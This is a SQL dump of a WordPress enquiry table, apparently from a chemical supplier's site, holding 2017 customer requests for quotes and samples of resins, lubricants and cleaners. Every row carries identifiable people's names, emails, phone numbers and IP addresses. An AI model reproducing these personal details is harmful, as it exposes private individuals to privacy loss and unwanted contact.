INSERT INTO `wp_enquiry_detail_new` VALUES (578, 'Austin Dietz', 'Austin@leaptechllc.com', 'I was given your company name by Hexion for small quantity sales.  Would you be able to sell/quote 5 gallon pails of the Heloxy 62 Modifier.  Thank you in advance.', '877696-4455', 'Heloxy 62 Small Qty Request', '50.240.75.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1216";s:5:"title";s:12:"HELOXY™ 62";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-62.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-27 20:05:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (579, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdasdasd', '', '', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-28 16:55:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (580, 'Anyang Wang', 'anyangwa@buffalo.edu', 'Hi,\nOur lab is interested in the product. Can I get a quote for the item. Also, could you let me know for the bottle size option.\nThanks,\nnanobioSensors &amp; MicroActuators Learning Lab (SMALL)\nDept. of Electrical Engineering\nUniversity at Buffalo\n233 Davis Hall\nBuffalo, NY 14260\n', '716645-8955', 'Quotation', '128.205.187.120', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-28 17:26:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (581, 'Alexandria Trujillo', 'atrujill@buffalo.edu', 'Hello, my lab is looking to begin microfluidics experiments, and from the literature some groups have used "Krytox 157 FSH oil" to help in droplet formation. Would we be able to receive a sample for initial proof of principle experiments? Thank you', '607377-6960', 'Samples?', '128.205.64.39', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-28 17:32:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (582, 'Cindy McCord', 'cindy.mccord@arlut.utexas.edu', 'I would like a quote for 12 cans of MS-260 Cleaner.', '512835-3383', 'Quote ', '146.6.208.38', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-28 19:43:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (583, 'Harry Harshaw', 'harry@h2obtech.com', 'We are in search of waterborne epoxy resin emulsions. Need both resin and hardener. This is a new project and wil be requesting samples. \n\nProperties we are looking for are better post cure strength, stain resistance, hydrophibicity, chemical resistance. Amines are preferred for curing unless you have some new curing formula. ', '678508-2609', 'New Project', '50.167.61.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1042";s:5:"title";s:17:"EPI-REZ™ WD 510";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";b:0;s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-01 04:12:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (584, 'Greg Striano', 'gregory.striano@honeywell.com', 'Price and delivery of the 8 oz aerosol p/n MS-381HCM', '215641-3170', 'MS_381', '199.64.6.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1668";s:5:"title";s:8:"MS-381HC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-01 14:22:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (585, 'Randy Caron', 'randy.caron@skyworksinc.com', 'Looking to purchase/quote', '781460-3681', 'MS-720 Cleaning solvent', '50.206.104.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1707";s:5:"title";s:7:"MS-720L";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-720L.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-01 17:45:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (586, 'Brian J Wallace', 'bjwallace@novanthealth.org', 'Is your item MLRMS182 still available and if not, is there a replacement item number?  Novant Health was buying this product through Medline and understand it might be discontinued.', '704920-7268', 'Degreaser', '216.227.194.45', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3363";s:5:"title";s:22:"H-1112B Skin Degreaser";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_280855511.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-01 18:00:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (587, 'Torger Totusek', 'regrot@aol.com', 'Hi, I have a space application where I need a low outgassing lubricant. I didn\'t realize you folks had so many options!! The applications are primarily small needle bearing and bushings. Which type would you folks recommend? Thanks..', '714381-1376', 'Space application Krytox', '23.243.47.88', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"645";s:5:"title";s:5:"240AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_439560973.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-01 18:36:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (588, 'michael nicholas', 'michael.nicholas@jetaviation.com', 'Would like to purchase one case of the MS-260 cleaner. CAn we buy direct from you or do we need to go through a vendor and if a vendor who would you recommend for New Jersey. Zip code if  07608', '716598-8275', 'purchase', '100.1.201.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-02 13:09:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (589, 'LAUREN KINSER', 'LAUREN.KINSER@PERFECT.COM', 'PLEASE QUOTE LIST PRICE, RESELLER PRICE AND LEAD TIME', '757766-8218', 'QUOTE', '174.77.94.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-02 14:33:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (590, 'christian siltanen', 'christian.siltanen@gmail.com', 'Could I please get a price quote for a sample (or other &lt; 1L size) of EPON 1002F.  I am with UCSF, in case you offer any educational discounts.  Thanks!', '541910-8277', 'price quote', '169.230.248.67', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"937";s:5:"title";s:13:"EPON™ 1002F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-1002F.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-02 19:22:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (591, 'Stephen Vaughan', 'steve@customgas.com', 'Please contact me regarding this product line and the Krytox LVP line.  I have some application questions.  Thank you.', '919632-8600', 'Tribosys Synthetic Greases', '174.109.116.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-02 19:22:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (592, 'Craig LaGiusa', 'clagiusa@harris.com', 'Please provide price and delivery on all quantity price breaks from 1-20 gallons.\n\n', '801461-9325', 'Request for Quote', '10.242.43.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-02 19:45:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (593, 'Mychal Spencer', 'mps297@psu.edu', 'A quote for a single quart please.\n\nThank you.', '360852-3821', '', '130.203.93.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-03 16:56:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (594, 'Howard Iturbe', 'iturbe@medtechprods.com', 'Hello, allow me to introduce myself.  My name is Howard Iturbe, I am writing on behlaf of Medical Technical Products, a small manufacturer in Southern California.\n I am looking for a sample of this product.  Please contact me at iturbe@medtechprods.com  Thank you!', '714376-2154', 'Sample of Krytox 240AD', '108.228.224.28', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"645";s:5:"title";s:5:"240AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_439560973.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-03 18:50:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (595, 'NANCY ORTIZ', 'ORTIZN.CON@AVINC.COM', 'Please provide me price and L/T for MS-122XD', '805581-2198', 'quote', '199.48.185.53', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:2:"48";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-03 19:19:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (596, 'Josiah Davis', 'josiah.davis@att.net', 'Hello,  I work at an automotive testing facility in Detroit Mi.  I would like to find a distributor in my area that sells your MS-580 cleaner.  We will be using it to clean connections on piezoelectric transducers in combustion analysis conditions.\nIf you deal directly with customers, please send me a quote for how much this solvent costs per can and per case.  If you do not deal directly with customers, please provide a vendor for me.  Thank you.  ', '313520-5958', 'MS-580 ', '64.215.209.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-03 19:30:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (597, 'dennis debolle', 'mdebolle@bellsouth.net', 'I would like to know were i can purchase this product.  ive used it many years and can no longer find it.  I live in st. augustine fl.  thank you  this is one great epoxy', '904797-5633', 'ms 907 two part epoxy', '107.137.229.248', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-04 16:45:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (598, 'Gabriel Young', 'newsboytko@live.com', 'Hello,\n\nI am interested in purchasing 1 oz of Krytox GPL 205 grease + 1 oz of Krytox GPL 100 oil in syringes.  How much would this cost?', '', 'Quote for 1 oz of Krytox GPL 205 + GPL 100', '24.17.211.72', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-05 18:57:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (599, 'Qaiser Khan', 'qaiser.khan@techniqueamerica.com', 'Please quote price and delivery terms for one drum (55 Gallons) of Dupont Vertrel MCA+.\nRegards,\n', '+1571-286-7374', 'Vertrel MCA+', '173.79.50.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 02:21:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (600, 'TGest Dan', 'ddillulio@mschem.com', 'test', '212222-2222', 'dan dyeys', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1072";s:5:"title";s:7:"AGL 683";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/gearbox-grease-krytox-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 09:54:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (601, 'Dan ddddd', 'ddillulio@mschem.com', 'test', '', '', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1673";s:5:"title";s:7:"MS-124H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 10:14:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (602, 'Dan ddddd', 'ddillulio@mschem.com', 'test', '', '', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1673";s:5:"title";s:7:"MS-124H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 11:10:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (603, 'Dan DIllulio', 'ddillulio@mschem.com', 'eererererer', '', 'ererer', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 11:13:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (604, 'dan duiwerwer', 'ddillulio@mschem.com', 'ertewrt', '', 'ertwertewrt', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1428";s:5:"title";s:18:"Fluoroguard™ PCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:81:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 11:17:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (605, 'test test', 'ddillulio@mschem.com', 'dsfsdf', '', 'sdfsdf', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1072";s:5:"title";s:7:"AGL 683";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/gearbox-grease-krytox-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 13:15:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (606, 'Jonathan Batt', 'jbatt@tainstruments.com', 'I am in need of a GHS-compliant US English SDS for this product.', '302427-4096', 'SDS needed', '107.0.202.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 13:21:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (607, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdasd', '', 'asdasd', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 13:25:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (608, 'sdfsfd sdf sdf', 'ddillulio@mschem.com', 'dsfsdf', '', '', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1072";s:5:"title";s:7:"AGL 683";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/gearbox-grease-krytox-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 13:57:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (609, 'Dan Krogstad', 'dkrogsta@illinois.edu', 'I would like a quote for 1 gallon of the epon 826 resin.', '217300-0376', 'Price quote', '192.17.104.244', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 16:37:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (610, 'Todd  Osborne', 'osbornet@ufl.edu', 'Would like to get a price for 4 oz tubes of GPL-205 lubricant', '', 'GPL-205', '128.227.153.213', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 17:12:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (611, 'sdf sd sdf', 'ddillulio@mschem.com', 'werwerw', '', '', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1072";s:5:"title";s:7:"AGL 683";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/gearbox-grease-krytox-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 17:54:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (612, 'Crystal Beaugez', 'crystal.beaugez@slugger.com', 'Price Quote Request for (24) cans.', '916652-4267', 'Quik-Freeze(R) MS-242N', '104.129.192.64', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 17:57:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (613, 'Andrew Czorniak', 'CzorniakAndrewj@sau.edu', 'Will this work for aluminum compression casting? How much is it?', '', 'Quote', '174.221.2.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-06 19:09:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (614, 'pual test', 'ddillulio@mschem.com', 'test', '', '', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1072";s:5:"title";s:7:"AGL 683";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/gearbox-grease-krytox-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 01:30:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (615, 'ddet er tert', 'ddillulio@mschem.com', 'ewtrt', '', 'ertertertertert', '107.3.95.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1673";s:5:"title";s:7:"MS-124H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 02:15:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (616, 'Michael Watson', 'mwatson@thomas-swan.co.uk', 'Would approximately need 1L of product, required as soon as possible', '', 'Research and Development', '82.109.47.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1168";s:5:"title";s:15:"EPIKURE™ 3055";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 09:21:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (617, 'Jessica Vreeland', 'jessica.l.vreeland@exxonmobil.com', 'Good morning,\nPlease send me a quote for one,  0.5 kg jar (each) of the following oils:\nKrytox VPF 1506\nKryotx VPF 1531\nKrytox GPL 107\n\nAlso, what is the lead time of shipping these samples?\n\nThank you!', '', 'Product Quote', '159.70.89.94', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"943";s:5:"title";s:8:"VPF 1506";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_257574442.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 13:01:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (618, 'William Morris', 'wmmorris@sandersfireandsafety.com', 'pls advise on the subject above', '518665-0400', ' 6--12cases', '67.248.28.228', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 13:17:49', '', NULL, '', '', '', NULL, '', ''); 
